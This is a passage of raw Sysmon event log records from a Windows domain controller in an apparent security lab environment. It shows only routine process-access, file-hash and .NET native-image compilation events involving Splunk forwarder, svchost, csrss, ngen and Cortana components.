Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000022566Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:56.922{4DB9351A-A270-60D3-2905-00000000CF01}5756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000022565Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:56.874{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=685880425FC5B17587A452659B83918F,SHA256=A7EF0E7C4396E3C680EFA629DD7986A309F740FD3752839C5BCA2EC59663C427,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022564Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:56.343{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E017C0A75B8D6D9C5AC61363F569CA30,SHA256=586E924CC2015EAF0308721D8C54944B6062BD1AFF005806AB86C50AE6BEB66F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022563Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:56.296{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A270-60D3-2805-00000000CF01}3576C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022562Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:56.265{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A270-60D3-2805-00000000CF01}3576C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022561Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:56.265{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A270-60D3-2805-00000000CF01}3576C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022560Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:56.249{4DB9351A-A26F-60D3-2705-00000000CF01}5968NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6O9LUCW441\WindowsBase.ni.dll.auxMD5=A6A87CBEFC959B346242D2CD52C8BA78,SHA256=80C6FFD063CD5359633AE280A57EBCE36C17726FA41D21CC62C37C7084A71DD0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022559Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:56.249{4DB9351A-A26F-60D3-2705-00000000CF01}5968NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6O9LUCW441\WindowsBase.ni.dllMD5=6432BA5DEE912DF8D8CAD0CFB879ED87,SHA256=466A529CF4D304F15629075BCDE49BB51C19DC85E0C21D02B05448885B0CBCDA,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022558Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:56.046{4DB9351A-A26F-60D3-2605-00000000CF01}63845552C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022666Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.966{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A271-60D3-3205-00000000CF01}6536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022665Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.950{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A271-60D3-3205-00000000CF01}6536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022664Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.935{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A271-60D3-3205-00000000CF01}6536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022663Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.935{4DB9351A-A271-60D3-3105-00000000CF01}3840NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\3XMY41LF9X\dfsvc.ni.exe.auxMD5=738471E1BCCDE3B58674AF57707847EF,SHA256=A733736401B309E1A14101FD084E5E4CCC5BD969CCCB5BB2194F8E9C34ADB267,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022662Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.935{4DB9351A-A271-60D3-3105-00000000CF01}3840NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\3XMY41LF9X\dfsvc.ni.exeMD5=708B0FC7ABCBA69B30D443BC028F10C0,SHA256=CCFC9EF2A7026DE1DDEDFBAA8BD380D4FFC1D423DCB6C787629E5CCA1BF67A34,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022661Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.919{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A271-60D3-3105-00000000CF01}3840C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022660Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.888{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A271-60D3-3105-00000000CF01}3840C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022659Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.888{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A271-60D3-3105-00000000CF01}3840C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022658Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.872{4DB9351A-A271-60D3-2F05-00000000CF01}6720NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\33H4SF12QO\DfsrAdmin.ni.exe.auxMD5=B9964912E299D3884D7DFE627C05C3A1,SHA256=771106FDFB9B90FEDE222D569626180DE7555444D188D5C37BD17FE1EE9C3744,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022657Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.872{4DB9351A-A271-60D3-2F05-00000000CF01}6720NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\33H4SF12QO\DfsrAdmin.ni.exeMD5=6A66B28E889A8D78BBFD00CEC240F45D,SHA256=3F477754FA38236E49EC6C540D34206726C7C76D8ED1D6865BC1563E014187B8,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022656Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.803{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A271-60D3-2F05-00000000CF01}6720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022655Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.788{4DB9351A-9F2B-60D3-C400-00000000CF01}7765616C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022654Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.788{4DB9351A-9F2B-60D3-C400-00000000CF01}7765124C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022653Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.788{4DB9351A-9F2B-60D3-C400-00000000CF01}7765616C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022652Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.788{4DB9351A-9F2B-60D3-C400-00000000CF01}7765124C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022651Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.788{4DB9351A-9F2B-60D3-C400-00000000CF01}7765616C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022650Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.788{4DB9351A-9F2B-60D3-C400-00000000CF01}7765616C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022649Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.788{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\W